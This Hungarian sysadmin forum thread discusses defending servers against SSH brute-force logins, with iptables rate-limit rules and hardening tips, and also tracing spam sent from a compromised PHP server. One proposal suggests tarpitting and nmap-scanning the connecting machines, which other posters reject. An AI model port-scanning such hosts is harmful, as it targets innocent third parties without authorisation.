ehhez az ssh töréshez lenne egy kérdésem! sokat tapasztaltam auth.log -ban, hogy tetszőleges ipkről próbálkoznak belépéssel a gépre, több usert, több jelszóval, majd továbbállnak! nem tud valaki olyan ssh configot, ami 3 sikertelen belépés után letiltja az ipt egy percig? vagy akármi hasonló is érdekelne!
- A hozzászóláshoz be kell jelentkezni
Mit szóltok egy ilyen megoldáshoz:
Van egy progi, nevezzük MrPort-nak. Ennek van egy szerver és egy kliens
oldala. A piszkálni kívánt gépen fut a szerver, ahol Te vagy, ott a kliens.
MrPort 2 porton figyel. a 22-esen és egy másikon, legyen ez a 10000-es.
A kliens oldal úgy tud kapcsolatba kerülni a szerver oldallal, hogy a
kliens küld egy hosszabb stringet és annak egyeznie kell a szerver oldali
ellenörző stringgel (a string konfigból állítható). Amikor a kapcsolat
létrejött a kliensen keresztül kiadsz egy parancsot, amitől az sshd
aktiválódik. Ettől kezdve lehet ssh-zni, de nem a 22-es porton, hanem
valamelyik másikon. Ha befejezted a munkát, akkor MrPort-cliensen
keresztül deaktiválod az ssht. MrPort 22-es portját pedig ragadós portnak
használod, ha valaki rákapcsolódik, akkor a nyitott csatornán szép lassan
adatokat csöpögtetsz neki, higyje csak, hogy ebből lesz valami, csak
rossz a vonal. Közben megnmap-pelheted, információkat szerezhetsz
róla, stb. A végén nem szabályosan lezárod a csatornát, maradjon csak
nyitva félig az ő oldalán, Te meg várod a következő támadást.
Ebben a megoldásban igyekeztem összesűríteni azokat a megoldásokat
amelyeket a korábbi hozzászólásokban többen is jónak tartottak.
Várom a véleményeket. Vegyétek észre, hogy az ssh ebben a
megoldásban csak akkor fut, amikor Te is akarod, tehát amikor Te nem
vagy jelen a az ssh-n való behatolás esélye 0(nulla) (Ja, plusz a shell
leszedése a mezei júzerekről.)
- A hozzászóláshoz be kell jelentkezni
Otletek:
Védekezés az ssh brute force támadások ellen
[quote:6b2ac36651="suti"]ehhez az ssh töréshez lenne egy kérdésem! sokat tapasztaltam auth.log -ban, hogy tetszőleges ipkről próbálkoznak belépéssel a gépre, több usert, több jelszóval, majd továbbállnak! nem tud valaki olyan ssh configot, ami 3 sikertelen belépés után letiltja az ipt egy percig? vagy akármi hasonló is érdekelne!
- A hozzászóláshoz be kell jelentkezni
Bárcsak azt mondja meg valaki, hogy ajánljátok a sok-sok jó kis blokkoló dolgokat, de! ezek ugye együtt nem futnak, mert akkor egymás ütik vagy a szabálylánc lesz olyan, hogy a jóisten se igazodik ki rajta. Végülis akkor mit csináljon az egyszeri rendszergizda? :-)
- A hozzászóláshoz be kell jelentkezni
[quote:7ea4d14028="_Polesz_"]Jajj drastik és hunger akkor arcotok van, ha elmentek az 5cm-es tévém előtt már akkor is lemaradok 2 sorozatról 8)
Vagy az is lehet, hogy nem az arcunk nagy, hanem egyszerűen sírva röhögünk azokon a security megoldásokon amiket egyesek itt elképzelnek. :wink:
[quote:7ea4d14028="_Polesz_"]Egyébként meg itt arról van szó, hogy hogyan lehet úgy biztonságosság tenni egy rendszert, hogy az ne menjen a használhatóság rovására. Vazz nem óhajtok minden egyes belépés előtt sms-t küldeni, portot kopogtatni ssh tunneleken keresztül a 20-ik proxy szerveren keresztül áthatolni, hogy egy ps parancsot ki tudjak adni a szerveren.
Nem is kell. Szerinted mi miért röhögünk veszettül ezen?
[quote:7ea4d14028="_Polesz_"]Valahogy kompromisszumokat keresünk a totális biztonság és használhatóság között.
Csak rossz irányba megy a tapogatózás.
[quote:7ea4d14028="_Polesz_"]Ha fikázást akarok akkor a flame rovatban nyitok topicot. Ha nincs értelmes hozzászólás akkor lehet alapba állítani a szájakat és ujjakat.
Tudtommal nem te nyitottad a topicot.
- A hozzászóláshoz be kell jelentkezni
[quote:900e05eff1="_Polesz_"]Bárcsak azt mondja meg valaki, hogy ajánljátok a sok-sok jó kis blokkoló dolgokat, de! ezek ugye együtt nem futnak, mert akkor egymás ütik vagy a szabálylánc lesz olyan, hogy a jóisten se igazodik ki rajta. Végülis akkor mit csináljon az egyszeri rendszergizda? :-)
Miért ütnék egymást? A grsec/pax önmagában is sokmindent megfog, ahogy trey írta. Ezen felül lehet erősen ACL-ezni vele. A rendesen belőtt iptables szintén előnyös lehet. A grsec-nek vannak chroot erősítő módszerei, amivel erősen növelhető a chrootolt dolgok biztonsága. Az SSH-t pedig tessék legalább AllowUsers-el és megfelelő tartományokra való korlátozással védeni.
Alapvetően az elmondható szerintem hogy törhetetlen gép nincs, de olyan van, amit nem az első ssh-scan fog megzúzni és olyan is, aminél gondolom nem éri meg a fáradtságot a törögetés. Akinek pedig olyan gépe van, ami bármiért igencsak kitett támadásoknak, az a végletekig növeli a biztonságot.
- A hozzászóláshoz be kell jelentkezni
[quote:7167af4261="andrej_"][quote:7167af4261="_Polesz_"]Bárcsak azt mondja meg valaki, hogy ajánljátok a sok-sok jó kis blokkoló dolgokat, de! ezek ugye együtt nem futnak, mert akkor egymás ütik vagy a szabálylánc lesz olyan, hogy a jóisten se igazodik ki rajta. Végülis akkor mit csináljon az egyszeri rendszergizda? :-)
Miért ütnék egymást? A grsec/pax önmagában is sokmindent megfog, ahogy trey írta. Ezen felül lehet erősen ACL-ezni vele. A rendesen belőtt iptables szintén előnyös lehet. A grsec-nek vannak chroot erősítő módszerei, amivel erősen növelhető a chrootolt dolgok biztonsága. Az SSH-t pedig tessék legalább AllowUsers-el és megfelelő tartományokra való korlátozással védeni.
Alapvetően az elmondható szerintem hogy törhetetlen gép nincs, de olyan van, amit nem az első ssh-scan fog megzúzni és olyan is, aminél gondolom nem éri meg a fáradtságot a törögetés. Akinek pedig olyan gépe van, ami bármiért igencsak kitett támadásoknak, az a végletekig növeli a biztonságot.
Értem én amit írsz, csak itt a sok iptables alapú megoldásra gondoltam mint egymást ütő cuccokra.
- A hozzászóláshoz be kell jelentkezni
[quote:d9b3287186="colos"]
egy dolog felsorolni a megoldasokat, mas dolog telepiteni es karbantartani a dolgokat. aki nem csinalt meg ilyet az sem tudja, hogyan tesztelje le, hogy egyaltalan megfeleloen muxik. azert kell sshzni mert dolgozni kell az embernek, nem pedig szorakozasbol sztem.
udv zoli
erdekes h nalam megis bevalt es mukodik
biztos csak veletlenul
- A hozzászóláshoz be kell jelentkezni
[quote:9f3bbf182b="suti"][quote:9f3bbf182b="samuf"]Ha már a bárhonnan SSH-ról van szó. Nem tudja valaki a magyarországi szolgáltatók ip címtartományát?
ilyesmire gondolsz: GEO IP ?
IP 10.0.0.5 belongs to a block consisting of the following:
nagyon okos :)))
- A hozzászóláshoz be kell jelentkezni
[quote:31bdb2c978="meditor"]Van egy progi, nevezzük MrPort-nak. Ennek van egy szerver és egy kliens
oldala. A piszkálni kívánt gépen fut a szerver, ahol Te vagy, ott a kliens.
MrPort 2 porton figyel. a 22-esen és egy másikon, legyen ez a 10000-es.
A kliens oldal úgy tud kapcsolatba kerülni a szerver oldallal, hogy a
kliens küld egy hosszabb stringet és annak egyeznie kell a szerver oldali
ellenörző stringgel (a string konfigból állítható). Amikor a kapcsolat
létrejött a kliensen keresztül kiadsz egy parancsot, amitől az sshd
aktiválódik. Ettől kezdve lehet ssh-zni, de nem a 22-es porton, hanem
valamelyik másikon. Ha befejezted a munkát, akkor MrPort-cliensen
keresztül deaktiválod az ssht. MrPort 22-es portját pedig ragadós portnak
használod, ha valaki rákapcsolódik, akkor a nyitott csatornán szép lassan
adatokat csöpögtetsz neki, higyje csak, hogy ebből lesz valami, csak
rossz a vonal. Közben megnmap-pelheted, információkat szerezhetsz
róla, stb. A végén nem szabályosan lezárod a csatornát, maradjon csak
nyitva félig az ő oldalán, Te meg várod a következő támadást.
Ebben a megoldásban igyekeztem összesűríteni azokat a megoldásokat
amelyeket a korábbi hozzászólásokban többen is jónak tartottak.
Várom a véleményeket. Vegyétek észre, hogy az ssh ebben a
megoldásban csak akkor fut, amikor Te is akarod, tehát amikor Te nem
vagy jelen a az ssh-n való behatolás esélye 0(nulla) (Ja, plusz a shell
leszedése a mezei júzerekről.)
Az egész mutatvány ott bukik meg ahol a port kopogtatós megoldás is. Nem veszed figyelembe, hogy a hálózati forgalmat lelehet hallgatni és az egész bejelentkezési rituálét lelehet utánozni. Vagy úgy gondoltad, hogy majd a MrPort nevű csodaprogramod is titkosított csatornát hoz létre, mint az ssh? Akkor viszont jóval bonyolultabb program lesz, ergo több lesz benne a biztonsági hiba. Ugyan ott vagy ahonnan kiindultál, csak még bonyolítottad a saját helyzetedet plussz egy programmal és csökkentetted a szervered biztonságát, mert még egy felesleges szolgáltatás fut. Miért nem inkább azon gondolkozol el, hogy megfelelő policy kellene és annak betartásával elkerülhető, hogy proba user legyen a szervereden proba jelszóval...
- A hozzászóláshoz be kell jelentkezni
[quote:c8da092c22="hunger"][quote:c8da092c22="_Polesz_"]Jajj drastik és hunger akkor arcotok van, ha elmentek az 5cm-es tévém előtt már akkor is lemaradok 2 sorozatról 8)
Vagy az is lehet, hogy nem az arcunk nagy, hanem egyszerűen sírva röhögünk azokon a security megoldásokon amiket egyesek itt elképzelnek. :wink:
[quote:c8da092c22="_Polesz_"]Egyébként meg itt arról van szó, hogy hogyan lehet úgy biztonságosság tenni egy rendszert, hogy az ne menjen a használhatóság rovására. Vazz nem óhajtok minden egyes belépés előtt sms-t küldeni, portot kopogtatni ssh tunneleken keresztül a 20-ik proxy szerveren keresztül áthatolni, hogy egy ps parancsot ki tudjak adni a szerveren.
Nem is kell. Szerinted mi miért röhögünk veszettül ezen?
[quote:c8da092c22="_Polesz_"]Valahogy kompromisszumokat keresünk a totális biztonság és használhatóság között.
Csak rossz irányba megy a tapogatózás.
[quote:c8da092c22="_Polesz_"]Ha fikázást akarok akkor a flame rovatban nyitok topicot. Ha nincs értelmes hozzászólás akkor lehet alapba állítani a szájakat és ujjakat.
Tudtommal nem te nyitottad a topicot.
Ez most mire volt jó? Ha nem szólsz hozzá érdemben, akkor légyszives
röhögj magadban, nem vagyunk kiváncsiak vegetativ idegrendszered
minden rezdülésére!
- A hozzászóláshoz be kell jelentkezni
MrPort-rol... Eloszor is egyetertek hunger velemenyevel. De meg megjegyeznek egy dolgok a nmappal meg az informacioszerzessel kapcsolatban.
Elfelejted, hogy a "tamadas" 99,999999%-al egy zombi geprol erkezik. Tehat egyebet nem ersz el, mint egy - az ignoranciajan kivul - artatlan emberket molesztalsz. Sot, ha jol tudom, az, hogy egy geprol tamadas van ellened, meg nem jogosit fel teged arra, hogy portscannel-d ot. Meg a vegen a kormodre koppintanak...
- A hozzászóláshoz be kell jelentkezni
Hu, de sok jó ötlet!
- A hozzászóláshoz be kell jelentkezni
[quote:8dfd11c0f1="1aca"][quote:8dfd11c0f1="muszashi"][quote:8dfd11c0f1="drastik"]
en arra lennek kivancsi hogy a sok "deninyan leenugz a kiraly" wanabe rendszergazda mikor tanulja mar meg hogy a szekurity nem az apt-get update
Pedig ott kezdődik!
Szvsz. sokkal biztonsagosabb egy jol bekonfigolt, nem teljesen up-to-date rendszer mint egy teljesen up-to-date, de nem jol bekonfigolt. Az apt-get update utan is marad eleg buffer overflow stb... Ha valaki nagyon be akar menni, be is fog. A kerdes, mit talal ott? Mihez fer hozza? Es hasonlok....
Ez nem is kérdés, írtam is példákat korábban a hogyanra. Viszont szerintem az up-to-date állapot is igen fontos. A script kiddie-k ugyanis igen gyakran tök régi sechole-okat használnak ki, ergo, ha az illető frissítené a rendszerét nem tudnának bemenni. (most nem a topicnyito ssh jelszókitílálósra gondoltam, mert arra többen is írtuk pl a kulcsok használata+magas portszámot+megfelelő csatolási opciók+chroot+kutyafüle) Tehát azt gondolom, hogy nem elég egyszer bekonfigolni valamit, azt naprakészen is kell tartani. Aki nem frissíti a rendszerét folyamatosan, az nem érdemli meg, hogy fizetést kapjon! ...és még ugye így sem garantált, hogy nem nyomnak fel, szóval a rendszeres mentést is el kell végezni a fizetésért! (vagy végeztetni cronból és értesítőt kapni az eredményről, amit el is olvasol.)
M.
- A hozzászóláshoz be kell jelentkezni
[quote:89aca6e54e="hunger"][quote:89aca6e54e="meditor"]Van egy progi, nevezzük MrPort-nak.
Az egész mutatvány ott bukik meg ahol a port kopogtatós megoldás is. Nem veszed figyelembe, hogy a hálózati forgalmat lelehet hallgatni és az egész bejelentkezési rituálét lelehet utánozni. Vagy úgy gondoltad, hogy majd a MrPort nevű csodaprogramod is titkosított csatornát hoz létre, mint az ssh? Akkor viszont jóval bonyolultabb program lesz, ergo több lesz benne a biztonsági hiba. Ugyan ott vagy ahonnan kiindultál, csak még bonyolítottad a saját helyzetedet plussz egy programmal és csökkentetted a szervered biztonságát, mert még egy felesleges szolgáltatás fut. Miért nem inkább azon gondolkozol el, hogy megfelelő policy kellene és annak betartásával elkerülhető, hogy proba user legyen a szervereden proba jelszóval...
Apafej, egy ugrókódos kommunikációba az hallgat bele aki akar, akkor
sem tud egy ilyen csatornán bejönni, ha bitről bitre megismétli azt
az adást, amit előzőleg én nyomtam. Másfelöl meg nem az oroszlánnál
akarok gyorsabban futni, hanem a fehérembernél. Az általam írt
megoldás az ssh ellen induló támadások döntő többségét kizárja.
- A hozzászóláshoz be kell jelentkezni
[quote:91e4be318f="meditor"]Hu, de sok jó ötlet!
Aztán mire sikerül megvalósítani a "tökéletes" biztonságot minden API megváltozik :-)
- A hozzászóláshoz be kell jelentkezni
[quote:136b1c84ad="colos"][quote:136b1c84ad="drastik"][quote:136b1c84ad="hunger"]huh, jó ez a topic. megint könnyesre röhögtem magam...
a sracok nagy szekuriti expertek
topicnyitonak:
btw.
1. miert a 22 es porton fut az sshd
2. miertnem jailben futnak a szolgaltatasok(vagy uml)
3. miert lehet sshzni barhonnan a gepre
4. ha mar linux akkor miertnem pax
5. miert passwd es miertnem kulcs
6. hogyhogy az osszes user su-zhat rootra
ez aki megtorte a gepedet egy luzer
egy profit eszre sem vennel
egy dolog felsorolni a megoldasokat, mas dolog telepiteni es karbantartani a dolgokat. aki nem csinalt meg ilyet az sem tudja, hogyan tesztelje le, hogy egyaltalan megfeleloen muxik. azert kell sshzni mert dolgozni kell az embernek, nem pedig szorakozasbol sztem.
udv zoli
Gondolom Kínából, Észak-Kórából és a Fidzsi szigetekről is be kell tudnod lépni. Azt vegyük már észre, hogy néhány hazai szolgáltató tartományára néhány /16-os ACCEPT vagy pass in rule-al talán még lehet élni és őrülten nagy karbantartást sem igényel. Ha olyan gép ami bármilyen okból publikus shellt ad, akkor tessék megoldani hogy chrootban legyen valami jailszerű (FreeBSD-vel pl. egészen kellemesen megoldható és még login classok meg MAC framework is van by default). Egyéb esetben, pedig a legkevesebb szükségesnél nem kell több shelljuzert kiadni.
Ezek a portknocking és más hasonló álmegoldások szerintem csak simán növelik a biztonsági kockázatot, amit pedig csökkenteni kéne. Ez a küldök egy SMS-t dolog is eléggé meredeken hangzik. Egyáltalán miért kell "bárhonnan" elérni egy gépet és ha ennyire fontos a biztonság, akkor miért nincs egy kevéssé publikus adminszerver, ahonnan lehet nyomulni?
- A hozzászóláshoz be kell jelentkezni
[quote:c9151c380d="1aca"]MrPort-rol... Eloszor is egyetertek hunger velemenyevel. De meg megjegyeznek egy dolgok a nmappal meg az informacioszerzessel kapcsolatban.
Elfelejted, hogy a "tamadas" 99,999999%-al egy zombi geprol erkezik. Tehat egyebet nem ersz el, mint egy - az ignoranciajan kivul - artatlan emberket molesztalsz. Sot, ha jol tudom, az, hogy egy geprol tamadas van ellened, meg nem jogosit fel teged arra, hogy portscannel-d ot. Meg a vegen a kormodre koppintanak...
Jah, hát erre az nmapos, visszatámados, jólmegnézős, információszerzős gondolatra már nem is akartam reagálni. A Testa nevű emberke irogatott annakidején hasonló megoldásairól, akkor is jól szórakoztunk. :lol:
- A hozzászóláshoz be kell jelentkezni
Sajnálattal hallom, hogy veletek is ez történt. Sokunknak volt ilyen esete. Akkor utánajártam. Amit tudni lehet, az az, hogy egy laza kapcsolatú, nagy román kalózbanda törögette, törögeti a magyar szervereket. Ugródeszkákat csinálnak, további betörésekhez, ahogyan te is írod, és anonim proxykat és chat-szervereket telepítenek. Az utóbbi időben lapítottak, mert volt némelyiküknek problémája. Ha ők azok, akkor lehet, hogy újrakezdik vagy folytatják?
A betörések valószínűleg DOS-támadások, nálunk -- hosszas utánajárás után kiderítettem --, az SSL-titkosítás bugját kihasználva törtek be. A konkrét menetét is megtudtam. Ahogyan én védekeztem: egyszerű eszközökből saját naplózó és belső védelmi programot készítettem. Amolyan utolsó védvonalként igen jól működik. Szinte semmit sem tudnak csinálni, és arról is azonnal -- nem csak hogy értesítést kapok, hanem -- gondoskodik, hogy válaszlépéseket megtegye, természetesen semmi rosszat, hiszen ugródeszkákat én sem akarok tovább "bántani". Roppant egyszerű az elve, éppen ezért hatékony. A lényege, hogy tudja, mi az, aminek történnie kell a szerveren, és mi az, ami gyanús. No, ebből szelektál. Nagy unka volt, de megérte. Tervezem is, hogy másutt is használom. Természetesen a végén, miután rájöttem a bugra, az SSL foltozását is megtettem. A román kalózokra meg jobban figyelnek.
Javaslom, értesítsd a szerveket, ha másért nem, a statisztika miatt!
- A hozzászóláshoz be kell jelentkezni
A feltörést követő eljárásod gyenge volt.
- A hozzászóláshoz be kell jelentkezni
Nekem is folyamatosan próbálkoztak, aztán beállítottam ezt:
iptables -A INPUT -i eth0 -p tcp -m tcp --dport 22 -m state --state NEW -m recent --set --rsource
iptables -A INPUT -i eth0 -p tcp -m tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 2 --rsource -j DROP
Udv,
O.
- A hozzászóláshoz be kell jelentkezni
gondoltam ezért nem nyitok új topikot, ide is belefér... véleményeket és ötleteket szeretnék tőletek.
a következő a helyzet: adott egy dedikált szerver amin szükségszerűen az ügyfél összehányt php kódját és egyéb hasonló dolgokat meg kell tűrni. ebből korábban már volt gond, mert ezen keresztűl húzták már meg a szervert...
az üzemeltetést átvettem, újrahúztam, a lehető legjobban megpróbáltam bebiztosítani, kapott mod-security -t, javíttattam jó pár dolgot a php kódokban, de se safe_mode nem kapcsolható se register_globals ki, + a kód miatt egy csomó egyébként általam nem preferált fv is kell (system és a többiek)... összegezve egy hatalmas gány az egész és átvizsgálhatatlan az php-s "portál" kódja...
a helyzet most:
-ezerrel jönnek vissza az egyik alap címre levelek (ami a feladó volt) a legkülönfélébb helyről, h nem lehetett kézbesíteni...
-a levelet nyilván senki sem küldte, spam...
-a visszakapott levelekben az elküldött levél fejléce is benne van amiből egyértelműen kiderül, h valóban a szerverről ment ki!
-a logokból semmi nem látszik, de tényleg!
-ps semmi különös
-netstat semmi különös
-levél küldés távolról csak auth után megy, helyből a permit_mynetwroks (127.0.0.0/8) (webmail ezen keresztül)
-webmailnak két cucc egymás mellett, squirrelmail és ilohamail, mindkettő külön linken, a linkek nem szerepelnek sehol
chkrootkit és rootkithunter semmit sem talál, persze ha vmi vhogy teljesen betúrta magát kernel szinten akkor ez nem feltétlenül csoda... sehogy nem látom és nem tudom visszakövetni, h mi és mikor küldi ki a levelet...
szóval itt jön a nagy kérdés, h mit és hogyan néznétek tovább, mit használnátok felderítésre?
rendszer: debian 3.1, rendszeresen frissítve, apache2, php4, mysql4.1, postfix/courier virtual userekkel(sql), + egyéb szűrések postfix alá de az ide lényegtelen...
- A hozzászóláshoz be kell jelentkezni
reg globals ne már
- A hozzászóláshoz be kell jelentkezni
nekem mondod? azt hittem a hajam tépem ki, mikor megláttam, h mi és hogy van "programozva"...
- A hozzászóláshoz be kell jelentkezni
iptables OUTPUT -ba betettem különböző -m owner --cmd-owner szűréseket a -p tcp --dport 25 kapcsolókkal és nézem időközönként, h mennyi csomi ment ki egy egy szabály alatt...
+ egy szabály a dport 25 -re ami az előzőekre nem passzolna... mindegyik accept de így legalább látszik a kimenő levél forgalom szétbontva több részre
tesztelve... ha küldök akkor valóban megjelenik a megfelelő rule sorában (iptables -L -n -v) a csomik száma...
lehetséges volna, h ezekbe nem kerül bele az ilyen jellegű spam küldés által generált forgalom?!?!
szerk.: ja, természtesen uid és gid -ek is fel vannak sorolva a rule list -ben az érdemlegesek közül, de egyszerűen nem látok semmi extrát...
- A hozzászóláshoz be kell jelentkezni
Nézd meg, hogy:
1, nem azzal szórakozik-e valaki, hogy a megcélzott emailcím nevében a szervereteknek egy nem létező címére dob levelet. Az onnan visszapattan, és már megy is a címzettnek.
2, Keress rá a kódban a mail szóra. Hátha elsőre kiszúrható f..ság van a kódban.
- A hozzászóláshoz be kell jelentkezni
1: sajna nem, egyrészről a mail logokban a spam -ek címzettjei egyáltalán nem szerepelnek, másrészről a külső küldéshez auth kell és az is látszana a logokban...
2: ez volt az egyik első, sőt diktatúrikusan le is tiltottam a mail() fv -t átmenetileg... amúgy apache.log -ból keményen rászűrtem az érintett fileokra de semmi extra eredmény...
- A hozzászóláshoz be kell jelentkezni
En a kovetkezokepp csinaltam. (tudom, eleg primitiv megoldas, de eddig meg mindig kiderult belole a megoldas). Mod_securityvel audit logot kapcsoltam (tudom, nagyon forgalmas szerveren nem jarhato ut, de akkor filtert kell betenni, es azzal logoltatni, minta lehet egy mailcim), majd azt nyalaztam at, miutan latszott, hogy spammeltek. Tuzfalon letiltottam addig a 25os portot kifele, mailqban felgyult a sok @aol.com -ra kuldott level, audit.log-ban rakerestem arra, hogy aol.com, es igy megtalaltam, hogy melyik juzer melyik szarjan keresztul tudnak folyamatosan maileket kuldeni. Eddig meg mindig a csodalatos mail() fuggveny volt a ludas. Ha a teljes logolas nem megy, es a levelek celzottan egy domainre mentek, pl aol.com, akkor megoldas lehet, hogy mod_sec-ben csinalsz egy filtert erre a domainre, aztan nem deny-oltatod, csak logoltatod vele, es ha makod van, a logban benne lesz ami neked kell.
- A hozzászóláshoz be kell jelentkezni
sajnos a relatív nagy forgalom miatt lehet h érdekes lesz de ha nem lesz más kipróbálom...
ezt eddig azért nem csináltam, mert az acces.log -ot egy hétre visszamenőleg úgy ki greppeltem 100 feltétel alapján, h rászűrtem a php fileokra, paraméter átadásokra és megszámoltattam minden hova a kérések számát, de nem találtam kiemelkedő számot (POST esetén sem), így valószínűsítem, h a spam -ek küldése nem egyenként megy mindig ugyan azon a sebezhetőségen keresztül, hanem vmi csúnyább dolgot sikerült kihasználniuk és localból mennek a dolgok
főleg h már a mail() fv disabled és így is megy... (visszajövő levelekben a küldött levél headerjében a received from és a dátum alapján, mert még mindig nem tudom hol és hogyan megy ki...)
- A hozzászóláshoz be kell jelentkezni
Ne csak a mail fv tiltsd le! Nézd meg pl a PHP.mailer-t is. Szerintem tényleg próbáld meg "mail"-t tartalmazó fájlokat átnézni.
- A hozzászóláshoz be kell jelentkezni
megtettem, de egyrészről a php mailer class nem volt fent alapban sem és utólag sem, másrészről semmi extra a 'mail' -t v. 'Mail' -t tartalmazó fileokban, azon kívül, h 1-2 persze kihasználható, de jelenleg nem azon megy a spam...
és most h tiltva a mail() nem látok kiemelkedő hibabejegyzéseket az error.log -ban, szóval nem itt a gubanc...
- A hozzászóláshoz be kell jelentkezni
sima socket használattal is megoldható ez, vagyis SMTP protokollt ismerő php oldallal is lehet spamet küldeni. Kérdés persze, hogy van-e ilyen a szerveren.
- A hozzászóláshoz be kell jelentkezni
nincs.
a sok kód át fgreppelve fsockopen meg hasonlókra is, de semmi...
az ilyen php -s kihasználásokkal tisztában vagyok, elég sokat foglalkoztam velük már korábban meló + hobbi :) által, a kérdés inkább az, h ha valahogy sikerült helyi tartalmat elhelyezni php -n kersztül amit lefutva vmi exploittal (bár mindig up to date a rendszer) beljebb jutottak a rendszerhez, akár kernelbe túrás szinten is akkor hogy találjuk meg a csúny process -t...
amúgy ami számomra iszonyatosan furcsa:
ahogy említettem iptables OUTPUT chain -be raktam egy rakás --uid-owner és --gid-owner áteresztő rule -t minden kimenő tcp dstport 25 -re, így látom h mi mennyit forgalmaz... DE, hétvége lévén a cég nem használja a levelezést leszámítva 2 embert aki kiküldött 2 email-t webmail -on keresztül... www-data -hoz meg is van ez a 2 levél adatmennyisége (317k), de "hivatalosan" más levelezés nem történt, ennek ellenére tegnap óta vagy 1200 levél jött vissza kézbesítetlenül és látom bennük a küldött levél fejlécéből h a mi szerverünktől márpedig ez idő alatt kapta meg...
miért nem látszik?
természetesen a végén van egy mindenre illeszkedő rule, szóval ha nem találnám el az uid -et v. a gid -et akkor ott lenne a nagy forgalom, de nem...
- A hozzászóláshoz be kell jelentkezni
IP Spoof?
- A hozzászóláshoz be kell jelentkezni
hát nem tudom... gondoltam rá, de az adatparkban?! bár nem tudom h védenek e ilyen szinten vmit, de azért illene...
- A hozzászóláshoz be kell jelentkezni
Az is egy lehetoseg, hogy irsz egy szkriptet, ami logtail-el nezegeti a logjaidat es ha megtalalja azt a patternt, ami egy ssh bruteforce vagy dictionary attackra utal, vagy csak szimplan portscanre, akkor kiad egy iptables -I INPUT -s IP -j DROP -ot.
Ezzel ha nincs iptables-save-restore megvalositas, rebootig ejtve van minden csomag a tamado cimtol. Ha van, akkor vegleg bannra tetted.
(Erdemes egy fix ip-t kivetelkent kezelni, nehogy spoofolt ip-rol kizarjanak teged is a hostrol, mert akkor mehetsz be konzolhoz:)
Portscanre pedig ez utal: sshd: Did not received identification string from X.Y.Z.W
altalaban ez utan jonnek a ssh belepesi kiserletek ugyanarrol a cimrol.
- A hozzászóláshoz be kell jelentkezni
hupsz..egy kicsit lemaradtam :)
az elozo meg az ssh tamadasokkal kapcsolatban ment :)
- A hozzászóláshoz be kell jelentkezni